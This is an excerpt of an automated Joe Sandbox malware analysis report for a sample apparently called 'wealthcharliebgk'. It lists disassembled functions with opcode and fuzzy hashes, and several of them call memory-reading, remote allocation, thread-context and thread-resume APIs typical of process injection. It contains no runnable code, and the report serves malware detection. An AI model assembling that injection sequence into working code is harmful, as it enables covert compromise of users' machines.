                                                                                                                                    • Instruction ID: 1b9b2d57fdfedebaf6fa51d4308dbf7b8f9761967ed6f36f30c97412fe7b2fd7
                                                                                                                                    • Opcode Fuzzy Hash: e0ccd8b94a9b223e23ed8fb583f0135ab9c9a918ffbcfdb8222ea702537ebe7a
                                                                                                                                    • Instruction Fuzzy Hash: 9A41CAB4D002589FCF00CFAAD880AEEFBB1BF49310F10942AE815B7250D335A959DF68
                                                                                                                                    Function 0048F810 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1125 48f810-48f8d8 ReadProcessMemory 1128 48f8da-48f8e0 1125->1128 1129 48f8e1-48f933 1125->1129 1128->1129
                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0048F8C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                    • Opcode ID: ef86ae0326b43298197864b83fd15084e9b9d45259c9f27091173da78ad558aa
                                                                                                                                    • Instruction ID: ff1f8592d0da83da37f7d0b72faacca16a378ecf49bfbde6395d59c517be21a6
                                                                                                                                    • Opcode Fuzzy Hash: ef86ae0326b43298197864b83fd15084e9b9d45259c9f27091173da78ad558aa
                                                                                                                                    • Instruction Fuzzy Hash: 4B41BBB4D002589FCF10DFAAD884AEEFBB1BF49310F10942AE815B7240D734A945CF68
                                                                                                                                    Function 0048F580 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1134 48f580-48f648 VirtualAllocEx 1138 48f64a-48f650 1134->1138 1139 48f651-48f69b 1134->1139 1138->1139
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0048F632
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 6ef783ff62998bf9ae96e06c41c2d2efb84885a65cee42def71d1ec3afef3b90
                                                                                                                                    • Instruction ID: a81a93f6bbc48d425b1037c89cdc151736f352b9996bf6c5a3c1d7cdf1588e29
                                                                                                                                    • Opcode Fuzzy Hash: 6ef783ff62998bf9ae96e06c41c2d2efb84885a65cee42def71d1ec3afef3b90
                                                                                                                                    • Instruction Fuzzy Hash: 4241A9B4D002589FCF10CFA9D984AAEFBB1BF49310F20942AE815B7310D735A956CF69
                                                                                                                                    Function 0048F588 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1144 48f588-48f648 VirtualAllocEx 1147 48f64a-48f650 1144->1147 1148 48f651-48f69b 1144->1148 1147->1148
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0048F632
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 32fce27783b75f7aee52c8cd80e5b7d25f280a4576815cf0a8f3d926e1907306
                                                                                                                                    • Instruction ID: 723e7b9acf73ee3fee4dee90fa0b6d7344033f6ecf3b3ef5d698e76dfe3ee1a4
                                                                                                                                    • Opcode Fuzzy Hash: 32fce27783b75f7aee52c8cd80e5b7d25f280a4576815cf0a8f3d926e1907306
                                                                                                                                    • Instruction Fuzzy Hash: 314199B4D002589FCF10CFA9D984AAEFBB1BB49310F20942AE815B7314D735A956CF69
                                                                                                                                    Function 0048F453 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0048F507
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 3379c3b6f3725745dd6078c2964131597f5dd4d5a9544af16645061c2fa02528
                                                                                                                                    • Instruction ID: b8b1bf6771869c77900f2519fef2d2609d1bc3ebd2ef03a8decf4df4e0453fed
                                                                                                                                    • Opcode Fuzzy Hash: 3379c3b6f3725745dd6078c2964131597f5dd4d5a9544af16645061c2fa02528
                                                                                                                                    • Instruction Fuzzy Hash: 5041BCB4D002589FCF10DFA9D884AEEFFB1AF49314F24842AE415B7244D7389949CF54
                                                                                                                                    Function 0048F458 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0048F507
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 885196e415d6b4c8808f7174b032a6e8b50de54666e210b023f757bcdf5415da
                                                                                                                                    • Instruction ID: 663d101edfa2713fe745b3ddaec8a79edb6f7f0e6040214ee390d5dc3cfb436b
                                                                                                                                    • Opcode Fuzzy Hash: 885196e415d6b4c8808f7174b032a6e8b50de54666e210b023f757bcdf5415da
                                                                                                                                    • Instruction Fuzzy Hash: 2741ADB4D002589FCB10DFAAD884AEEFBB1AB49314F24842AE415B7344D738A949CF54
                                                                                                                                    Function 0048F368 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 0048F3E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: 28ce80cc12eafcb800aeb63c3b7280e5e62e17e2e6943247ddc58e7efae1345f
                                                                                                                                    • Instruction ID: 7d226f8418068448a19a8478f6bc0edbfb3c980c5a4357c70c0e82a319aa014b
                                                                                                                                    • Opcode Fuzzy Hash: 28ce80cc12eafcb800aeb63c3b7280e5e62e17e2e6943247ddc58e7efae1345f
                                                                                                                                    • Instruction Fuzzy Hash: DF31BCB4D002189FCF10DFAAD984AEEFBB5AF49314F24942AE815B7300D735A905CF98
                                                                                                                                    Function 0048F364 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 0048F3E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: d7fdf5cf04911889454f1767f9aba23fa5a2027c462986f51bc67bfb497c57f3
                                                                                                                                    • Instruction ID: d826dd008df0675243f6138a0d735ac83e6cb30f0383eba95993f044c9473882
                                                                                                                                    • Opcode Fuzzy Hash: d7fdf5cf04911889454f1767f9aba23fa5a2027c462986f51bc67bfb497c57f3
                                                                                                                                    • Instruction Fuzzy Hash: 6031BBB4D002189FCF10DFA9D984AAEFBB1AF49314F24942AE815B7310D735A905CF98
                                                                                                                                    Function 00961562 Relevance: .2, Instructions: 156COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f72d2fc70e98a7d8b3b75a984136bac6edc1ab5cdaef0c80b962f26eddd2325c
                                                                                                                                    • Instruction ID: 8499b6fd3e9349e7b84fe6b254cc632d4362ad13d5e58fdc78186264d4c86b61
                                                                                                                                    • Opcode Fuzzy Hash: f72d2fc70e98a7d8b3b75a984136bac6edc1ab5cdaef0c80b962f26eddd2325c
                                                                                                                                    • Instruction Fuzzy Hash: 2B512474D09228CFDB24CF65C880BE8B7B9BB9A301F2895EAD40EA7251D7745AC5DF40
                                                                                                                                    Function 00960C90 Relevance: .1, Instructions: 144COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5409a3744c7ec822bde7faa565680ab4094138d14b4776fad7fab795adce2b0d
                                                                                                                                    • Instruction ID: da893ab4d7c796f608305b7e2a4d37c210c5ef7888961138674c236da433178e
                                                                                                                                    • Opcode Fuzzy Hash: 5409a3744c7ec822bde7faa565680ab4094138d14b4776fad7fab795adce2b0d
                                                                                                                                    • Instruction Fuzzy Hash: 235159B4A09259CFCB04CFA8D5C09AEFBF1FF98314F249A59D455A7292C734A842CF90
                                                                                                                                    Function 009600C6 Relevance: .1, Instructions: 140COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0c4217c4baf92100547291a8bb4e7988a0fb4793e78469e5c4924ba19603b214
                                                                                                                                    • Instruction ID: f45f61055e4effc1e40711a477a7a8df9d6cf011d6477ebccdb60212bb7af03e
                                                                                                                                    • Opcode Fuzzy Hash: 0c4217c4baf92100547291a8bb4e7988a0fb4793e78469e5c4924ba19603b214
                                                                                                                                    • Instruction Fuzzy Hash: AF514A34809214CFCB14CFA4E4C87FEBBB8FB8A306F51646AD01AA62A1DB785585DF14
                                                                                                                                    Function 00961818 Relevance: .1, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 09c6159318d337e53b31b4365a61bb792c013354dae57f9dbb7618a825818b9d
                                                                                                                                    • Instruction ID: 4f8e9ab5d704e2b07d0855d91f5a85e5164372102b83137146bc77404661cdd5
                                                                                                                                    • Opcode Fuzzy Hash: 09c6159318d337e53b31b4365a61bb792c013354dae57f9dbb7618a825818b9d
                                                                                                                                    • Instruction Fuzzy Hash: 35311874D08229CFCB24CF65C944BE8B7F5EB49311F1894EAD40EA7291DB348A85EF11
                                                                                                                                    Function 009613C7 Relevance: .1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ec3eb49105fc76f4ddfa0734950bc5bb1ea75c7386deb03ffe3d8be6cb4b1060
                                                                                                                                    • Instruction ID: 83b78f50dfdf6e939e9c4bbb06af4acd246dd128955e112475c9de2f468b375f
                                                                                                                                    • Opcode Fuzzy Hash: ec3eb49105fc76f4ddfa0734950bc5bb1ea75c7386deb03ffe3d8be6cb4b1060
                                                                                                                                    • Instruction Fuzzy Hash: EC413678909268CFDB65CF54DC80BE8BBB5BF49300F1490EAD44DAB291EB709A85CF40
                                                                                                                                    Function 009614B1 Relevance: .1, Instructions: 86COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ecce76de3aa31dba280ab0e3edb70f6303e5888a0c50ddded10e2a21559e8fb7
                                                                                                                                    • Instruction ID: 6b1232b20ce17d1c0bc43d2e6ceab8689acb3fb6dc6f93ed3b4659e1ae0d2a70
                                                                                                                                    • Opcode Fuzzy Hash: ecce76de3aa31dba280ab0e3edb70f6303e5888a0c50ddded10e2a21559e8fb7
                                                                                                                                    • Instruction Fuzzy Hash: 8F410774905228CFDB64DF54DC84BE9BBB5BF49300F2491EAD44DAB291EB705A85CF40
                                                                                                                                    Function 001ED3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.370874282.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1ed000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e61b81777ea8c91b34a82974e7be5187b3cf0c16a912a265344d2889c07676e8
                                                                                                                                    • Instruction ID: 66328aa7553add82f1159b1d90f55298306338994d7b9c73131c51ae74908cf6
                                                                                                                                    • Opcode Fuzzy Hash: e61b81777ea8c91b34a82974e7be5187b3cf0c16a912a265344d2889c07676e8
                                                                                                                                    • Instruction Fuzzy Hash: 9E213AB5504684DFDB15CF14E9C0B2ABF65FBA4314F34C569E8054B686C336E846CBA2
                                                                                                                                    Function 002FD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371349713.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_2fd000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9ce4acdbbc61592ac912187de782f885ddf9da8bac1c012763f0ca0ef5d0a18e
                                                                                                                                    • Instruction ID: 8d9ffa3ef7c86676bd27d0d0d10bea48e0e565409eff1212f07d4c6bd574b27f
                                                                                                                                    • Opcode Fuzzy Hash: 9ce4acdbbc61592ac912187de782f885ddf9da8bac1c012763f0ca0ef5d0a18e
                                                                                                                                    • Instruction Fuzzy Hash: 28210075614248EFDB15CF24D880B26FB62EB84314F20C57DE90A4B246CB76D81BCBA1
                                                                                                                                    Function 002FD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371349713.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_2fd000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4ce3ae5d6c0fcec85bc12e24220c69d9807c893958e0af7f03c37b84a7f84849
                                                                                                                                    • Instruction ID: cc51e8d55f8e801aaf14e6a110c14d4554c3abde3e0224ef172b461a2cae4413
                                                                                                                                    • Opcode Fuzzy Hash: 4ce3ae5d6c0fcec85bc12e24220c69d9807c893958e0af7f03c37b84a7f84849
                                                                                                                                    • Instruction Fuzzy Hash: 5A21D375614248AFDB01CF14D9C0B36FB62EB84314F24C579ED494B246C376D856CBA1
                                                                                                                                    Function 00960828 Relevance: .1, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cbd5a4dea0745180d3b79cf841fa5ff09b2ff22897159de6dc4bae9498ca6f78
                                                                                                                                    • Instruction ID: 1b0825b1cdf94f8ab49945395be8739d72a536bc87c81b25c69c8863f03e5d46
                                                                                                                                    • Opcode Fuzzy Hash: cbd5a4dea0745180d3b79cf841fa5ff09b2ff22897159de6dc4bae9498ca6f78
                                                                                                                                    • Instruction Fuzzy Hash: 2A21E674D092498FCB40DFA4D9585AEBFB1FF8A305F2065AAD41AA3361E7705A01CF91
                                                                                                                                    Function 002FD006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371349713.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_2fd000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 517ec1f54a7c0c93f7ee9ec5547d256521c0831f75e52e06a81322cc1151b33f
                                                                                                                                    • Instruction ID: 70668c4574bb0b9b86dfa3092d7f8279401f82d4d240257e1a3cff97211f6bd1
                                                                                                                                    • Opcode Fuzzy Hash: 517ec1f54a7c0c93f7ee9ec5547d256521c0831f75e52e06a81322cc1151b33f
                                                                                                                                    • Instruction Fuzzy Hash: E2217C755093848FDB02CF24D994715BF72EB46314F28C5EAD8498B2A7C33A981ACB62
                                                                                                                                    Function 009605C8 Relevance: .1, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e0f090dd0af4c0f1d72f0f60b09fe05ea3429508b8b26968f0a26c269c42bb06
                                                                                                                                    • Instruction ID: c5bf6e4685630b5dc5f3839c37916c9f004e26023958c56fa974632fc36a3409
                                                                                                                                    • Opcode Fuzzy Hash: e0f090dd0af4c0f1d72f0f60b09fe05ea3429508b8b26968f0a26c269c42bb06
                                                                                                                                    • Instruction Fuzzy Hash: 19113D74D05218DBCB04AFA9D9482FEBBB9FBC9301F10556AD41AB3290DB790A14CFA4
                                                                                                                                    Function 001ED3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.370874282.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1ed000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                                                                                                                    • Instruction ID: 245b1cbbbe6a0a2164ddfe1521e37abd8246d3d6e78c1f4a738577c9fb505f29
                                                                                                                                    • Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                                                                                                                    • Instruction Fuzzy Hash: C511E976504680DFDB12CF14D5C4B1ABF71FB94314F24C6A9D8094B656C33AD45ACBA1
                                                                                                                                    Function 009605B9 Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 403325520d0b6b506617fb112e4cd69522dcb2b9403a34aae10f841790cc305d
                                                                                                                                    • Instruction ID: ef73fc19f87fcdfa39014243927d8e93fec81df06b73ff3c8ac6790f5d06e24c
                                                                                                                                    • Opcode Fuzzy Hash: 403325520d0b6b506617fb112e4cd69522dcb2b9403a34aae10f841790cc305d
                                                                                                                                    • Instruction Fuzzy Hash: 54110431909204CFCB118FA8D5883FFBBB4EF86300F0416EAD40A972A1D7780A18DF91
                                                                                                                                    Function 00960AF0 Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1853ebab268e410c429424e82b37a72ca5244361b3fd642f49a47100442bd4c6
                                                                                                                                    • Instruction ID: 15732d87eed972f8b0adfc9cea60b7cc6577cec0056636aa1f56d58c49ab9e14
                                                                                                                                    • Opcode Fuzzy Hash: 1853ebab268e410c429424e82b37a72ca5244361b3fd642f49a47100442bd4c6
                                                                                                                                    • Instruction Fuzzy Hash: C6110474D08209CFCF44DFB8D8955AEBBB5BF89304F2491AAD419A3315E6340A01CF91
                                                                                                                                    Function 002FD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371349713.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_2fd000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                                                                    • Instruction ID: 3e12b14665e46b6937580dea46818f6ca20e714211e0ac91c7db66d9ee0cb98b
                                                                                                                                    • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                                                                    • Instruction Fuzzy Hash: BD11BB75904284DFDB02CF10C5C4B25FBA2FB84314F28C6AEDD494B256C33AD85ACBA1
                                                                                                                                    Function 00960678 Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 316b6a508b37cf2c4b514206c65b80eaf3456008029342f8da5132e75fa688fa
                                                                                                                                    • Instruction ID: 5f1575693ca69a302fbf04dd9782e3d541a021a8c4f18155a50940f004d79b7f
                                                                                                                                    • Opcode Fuzzy Hash: 316b6a508b37cf2c4b514206c65b80eaf3456008029342f8da5132e75fa688fa
                                                                                                                                    • Instruction Fuzzy Hash: 67110A74C09349DFCB01DFA8D9942AEBFB4FF8A300F2095A6D805A7351D7741A11CB91
                                                                                                                                    Function 00960B00 Relevance: .0, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 80952547c36197f6ad260fca65df45102456f04a9242a7d4fe713520ef656675
                                                                                                                                    • Instruction ID: 030c876baa59a5ada27498f118fa16aa2260813e9cad61da6d73401a73903fb2
                                                                                                                                    • Opcode Fuzzy Hash: 80952547c36197f6ad260fca65df45102456f04a9242a7d4fe713520ef656675
                                                                                                                                    • Instruction Fuzzy Hash: 6B11A574D08209DFCF44DFA9D9855AEBBF5BB88304F2095AAC819A3314E7345A41DF91
                                                                                                                                    Function 0096163C Relevance: .0, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 03873a4ea5c1b8668d15a9c53497c4363fc8eea98d21880e0d0af7def8be1b1d
                                                                                                                                    • Instruction ID: 52fbe127075c65d41c4bc6b4aa8b0ef88b6d6f8dc1a7b76177d813f897fc99a6
